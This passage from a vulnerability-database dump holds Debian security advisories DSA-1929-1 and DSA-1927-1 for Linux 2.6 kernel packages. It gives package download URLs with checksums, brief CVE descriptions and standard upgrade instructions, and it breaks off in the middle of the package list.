http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 23440762 aace7bef32f7f7f69e1aeed69d191c41\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 266308 228979a449e897802d4089909eef0326\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 2978226 214923bbb5171e2a3daa23ed31240118\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 267100 60048c2f207f0b00b1fab86639f3c276\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 23393346 1fcae90244756e9b1ed37b08a8e39b99\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 23752762 c6b5c665617a937c6caee0558daa8b2d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_alpha.deb\n Size/MD5 checksum: 3001856 cb672b346cd9b30717e4446ee2545fff\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 3339600 83ef8191115cf0c23599b2ad45da661c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 15279100 dba0ecedc142a8f29c08ff3cb35fc9e5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 3362362 7acf6afbec42d7e386e4e99f45e07849\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 16822140 04e89e226683aee6fc0f5e2d2751e258\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 277136 04ba98f1750e31f17a52caa0add3e419\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 3196356 37e16a42ebf900a63d15ec1c47bd2a2a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 15266172 647285195e9651e86fc78f47ca3e6aa3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 1687964 2556db55e5438dc01309d7d461f91ee3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 3173540 5e0fd0af39da8904a5fc459e00fe1592\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 276536 ac228fd76c2a64910f1194c39f5dd9a5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 274660 9817c928baacf675542085e0387cfedc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 16868682 d99a5ffc0a0c88dee5f8c279e3f96f64\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 58278 4825706649861dcc9afd8438f961ec6e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 1656646 633e8373c64bb27bc283e87300ebe6cf\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 276056 60aec7d94ae1a1afa21cc68d5b7d3c53\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 58254 8bb6069f2f74da9b2bb5603898dc22e3\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 58240 51d240b42f43c2cb30c31f5c4bf2117c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_amd64.deb\n Size/MD5 checksum: 58254 31e336851095fea2499e594987acea4b\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 10563254 4486c3660f904e4bd439c370b7f97c69\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 11814740 f178d4aa3358d09a492436d29dbee5cb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 202308 42a4b6b6b9c2f711d4c3b932353457fb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 11404596 9bd75cb26f23cc0c012dbcc1458c547f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 11005460 01d3a246f1ffe6f368fa6ca9f4548e97\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 3026810 ef214434dcb13fe3bdd684bf580a6b9b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 203070 d50c921e10f3dd82ff85287acaf0b14f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 201556 da0a211d54dcd3e34fa29514c9934f9d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 58368 9917c0b22afe4c440ec64ff6d2a608e4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 201912 163590408b3e663b5f8cfae14e3c89a5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_hppa.deb\n Size/MD5 checksum: 58338 58f6a43a14a89d67bb46c796e8bde247\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 290694 8a08177d6d4f46a20086b489ce4decf2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 280544 0ffbb9bc4aee76a067cebcec6f31f62e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 287894 831999c67686f31d2346b0fa6b4948aa\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 16543512 c0b9fdc137151b96ccb8198fab8b5f72\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 16931792 b73f3867a2efef757fcd111916116105\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 14401768 eb0e34a9dfc17344c471b158faeab021\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 58386 9ef707bff12f1cdb495a075c13325564\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 58324 a00b5e3696278aa2d9c59f16267e3d06\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 16326580 3ad3c0068e6343b6e5f70f3c44fdb3d5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 289228 4fcd19b2eb92b4550dc4a7673acc4f62\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 16645286 1b2290466641e1d9ef3ecf942180fe79\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 3215828 0c99ba0dd4abce66cda2fe6c554ccc03\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 16517286 a729d0b07130c615d0d32d7b2ac46852\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 289284 183af751e23717e0ac5821f60959e5ad\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 14392520 cc51caf6cedda77521b7ee9065478392\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 288014 c4834561b492ff42175353c524e0cbd1\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 58340 7c463341e612b3159e0032aaf62ab5e1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 16477446 5829e6f2dce15ae1f3f74ca4d4180847\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 291792 74558945d364674729b71b4d2598d1c8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 1304666 d9f7fb52fe8d29a9880ebc697eaae90f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 3239372 a7e8ba983a1e45176d33b86871e3940e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 3117812 36cc1af70a13016e79224a3f90981ac8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 1332688 a1c7f6d7435eaeb22c4e7097611602e5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 278926 cf2ec90e9c683c7c5904e76145b2b562\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 3231506 8e9ff0b708e2e616072f569f0682fa11\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 16604666 4d7eb157fa109072d21ec472bbbb46f1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 280110 d34163dab810a30572c7c1a29b9efdb6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_i386.deb\n Size/MD5 checksum: 58326 bd8f5323a48ba297f6f404a4f26fd864\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_ia64.deb\n Size/MD5 checksum: 58254 d64ce41c696ae0af6e65348111b0e1c2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-26etch1_ia64.deb\n Size/MD5 checksum: 58276 509dcd2833bd560ed6dccffc0a448593\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-26etch1_ia64.deb\n Size/MD5 checksum: 259696 9e187526ddd2342af180682ab502f302\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-26etch1_ia64.deb\n Size/MD5 checksum: 259718 b670f97d9bd044492111b7698ed228c3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-26etch1_ia64.deb\n Size/MD5 checksum: 28023040 9c2dbc349ec7702f781f978f27987da9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_ia64.deb\n Size/MD5 checksum: 3087206 3638b390791d5053b67b060e6a124866\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-26etch1_ia64.deb\n Size/MD5 checksum: 28194506 228765e996a15ef56fc2cb94e74abeeb\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 3462292 f3f1c68ba029943c6054421c1ba23059\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 261230 26a45e4c0a77f21af0e5a6ffb0dc2b63\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 58266 f717cc289546c2037e4ca18aa630ceb9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 3486460 4c5d5df532d84da56f78e47ce6262d60\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 262664 e499f6e0e4278f5d4263c9a952877624\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 263770 d12d5f3fce934b3db4dd29d5349d84a4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 15240084 96adc4183855af04aaeca7db1d37a27e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 17113852 9db05c81e32ef07f342eb54374c6ac6e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 16727566 dfbc08d63a91ba7bef73dfca238559f7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 16506028 0f65a31aecb306f281348ad410174926\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 17068826 bc0941830a8d7369abaf876837a0c81e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 262882 d5d2a01011e0a9efea7a7b2c0cbacc41\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 18433752 23a6d8183e781a43469daf3cd7769fcb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 237826 90097f02a1ed0a29b81fe3bc64259696\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 58312 6330638237601d3ea55b2a80d1c54540\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 18384182 18eabc40e998896c8f77243e84f99458\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 254332 4ac0852bf3ba527f890f828ecd749284\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-26etch1_powerpc.deb\n Size/MD5 checksum: 262220 a5ee6d47da04555615ad2bab7f646b13\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 148246 96f1a25db3b6aa699af3ad7185a96bd2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 149402 44a4ec702fc2410f733aabe494c0f4e4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 148624 78919a54c4a93dbf395369a106c76b5b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 58276 133b1b15cca9cb34e07eae4f3ec4a3db\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 5410288 dd1b3737c133081f4b512c2a1ecb1cf6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 5626808 5b7dc2c64fac5988d6070a1cddeb19f3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 5672368 f31471a55f12bb17eade213d7672cb80\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 2971470 e546925e4309b61b6b598de04b6a1e5a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 1445974 f80e8929c0406cbae86ba2bdf6c611e2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 58256 3c413237e42a72c9b70f58cb65278ce9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch1_s390.deb\n Size/MD5 checksum: 2948300 f57e56f38edd5977cf95012c373f9519\n\n These changes will probably be included in the oldstable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "modified": "2009-11-06T00:52:00", "published": "2009-11-06T00:52:00", "id": "DEBIAN:DSA-1929-1:8AEEF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00252.html", "title": "[SECURITY] [DSA 1929-1] New Linux 2.6.18 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ----------------------------------------------------------------------\r\nDebian Security Advisory DSA-1927-1 security@debian.org\r\nhttp://www.debian.org/security/ dann frazier\r\nNovember 5, 2009 http://www.debian.org/security/faq\r\n- ----------------------------------------------------------------------\r\n\r\nPackage : linux-2.6\r\nVulnerability : privilege escalation/denial of service/sensitive memory leak\r\nProblem type : local\r\nDebian-specific: no\r\nCVE Id&#40;s&#41; : CVE-2009-3228 CVE-2009-3238 CVE-2009-3547 CVE-2009-3612\r\n CVE-2009-3620 CVE-2009-3621 CVE-2009-3638\r\n\r\nNotice: Debian 5.0.4, the next point release of Debian &#39;lenny&#39;, will\r\ninclude a new default value for the mmap_min_addr tunable. This\r\nchange will add an additional safeguard against a class of security\r\nvulnerabilities known as &quot;NULL pointer dereference&quot; vulnerabilities,\r\nbut it will need to be overridden when using certain applications.\r\nAdditional information about this change, including instructions for\r\nmaking this change locally in advance of 5.0.4 &#40;recommended&#41;, can be\r\nfound at:\r\n http://wiki.debian.org/mmap_min_addr\r\n\r\nSeveral vulnerabilities have been discovered in the Linux kernel that\r\nmay lead to a denial of service, sensitive memory leak or privilege\r\nescalation. The Common Vulnerabilities and Exposures project\r\nidentifies the following problems:\r\n\r\nCVE-2009-3228\r\n\r\n Eric Dumazet reported an instance of uninitialized kernel memory\r\n in the network packet scheduler. Local users may be able to\r\n exploit this issue to read the contents of sensitive kernel\r\n memory.\r\n \r\nCVE-2009-3238\r\n\r\n Linus Torvalds provided a change to the get_random_int&#40;&#41; function\r\n to increase its randomness.\r\n\r\nCVE-2009-3547\r\n\r\n Earl Chew discovered a NULL pointer dereference issue in the\r\n pipe_rdwr_open function which can be used by local users to gain\r\n elevated privileges.\r\n\r\nCVE-2009-3612\r\n\r\n Jiri Pirko discovered a typo in the initialization of a structure\r\n in the netlink subsystem that may allow local users to gain access\r\n to sensitive kernel memory.\r\n\r\nCVE-2009-3620\r\n\r\n Ben Hutchings discovered an issue in the DRM manager for ATI Rage\r\n 128 graphics adapters. Local users may be able to exploit this\r\n vulnerability to cause a denial of service &#40;NULL pointer\r\n dereference&#41;.\r\n\r\nCVE-2009-3621\r\n\r\n Tomoki Sekiyama discovered a deadlock condition in the UNIX domain\r\n socket implementation. Local users can exploit this vulnerability\r\n to cause a denial of service &#40;system hang&#41;.\r\n\r\nCVE-2009-3638\r\n\r\n David Wagner reported an overflow in the KVM subsystem on i386\r\n systems. This issue is exploitable by local users with access to\r\n the /dev/kvm device file.\r\n\r\nFor the stable distribution &#40;lenny&#41;, this problem has been fixed in\r\nversion 2.6.26-19lenny2.\r\n\r\nFor the oldstable distribution &#40;etch&#41;, these problems, where\r\napplicable, will be fixed in updates to linux-2.6 and linux-2.6.24.\r\n\r\nWe recommend that you upgrade your linux-2.6 and user-mode-linux\r\npackages.\r\n\r\nNote: Debian carefully tracks all known security issues across every\r\nlinux kernel package in all releases under active security support.\r\nHowever, given the high frequency at which low-severity security\r\nissues are discovered in the kernel and the resource requirements of\r\ndoing an update, updates for lower priority issues will normally not\r\nbe released for all kernels at the same time. Rather, they will be\r\nreleased in a staggered or &quot;leap-frog&quot; fashion.\r\n\r\nThe following matrix lists additional source packages that were\r\nrebuilt for compatibility with or to take advantage of this update:\r\n\r\n Debian 5.0 &#40;lenny&#41;\r\n user-mode-linux 2.6.26-1um-2+19lenny2\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nStable updates are available for alpha, amd64, armel, hppa, i386,\r\nia64, and powerpc. Updates for other architectures will be released\r\nas they become available.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-19lenny2.dsc\r\n Size/MD5 checksum: 5778 8ea6c47c6f227f855a41deea57d988d8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-19lenny2.diff.gz\r\n Size/MD5 checksum: 7651053 5cf749f9817436c544df97bc0217f125\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz\r\n Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-19lenny2_all.deb\r\n Size/MD5 checksum: 106866 d25eeb65132ec68406d8fdf7ea340274\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-19lenny2_all.deb\r\n Size/MD5 checksum: 4627374 196ffe954d4e906638c7eb2bd22e310d\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-19lenny2_all.deb\r\n Size/MD5 checksum: 2565284 0682418bd83f755a17a71435e535f91a\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-19lenny2_all.deb\r\n Size/MD5 checksum: 48672074 5aa4d0110919b100a772509455b22757\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-19lenny2_all.deb\r\n Size/MD5 checksum: 1768032 cb95ea5101339c35d425ac1ba2f0ff02\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-19lenny2_all.deb\r\n Size/MD5 checksum: 122160 0d3dd77a86989aa6e6bdfbbf548d22a6\r\n\r\nalpha architecture &#40;DEC Alpha&#41;\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 106376 891beea699175e77b6f4cdb1dbbd2377\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 363880 278fefb639e7029af6d5017dedefb500\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 28487296 beb21f0f222b507898406b051d161c25\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 106358 b4c10db49252b22e7019746743624712\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_alpha.deb\r\n Size/MD5 checksum: 741234 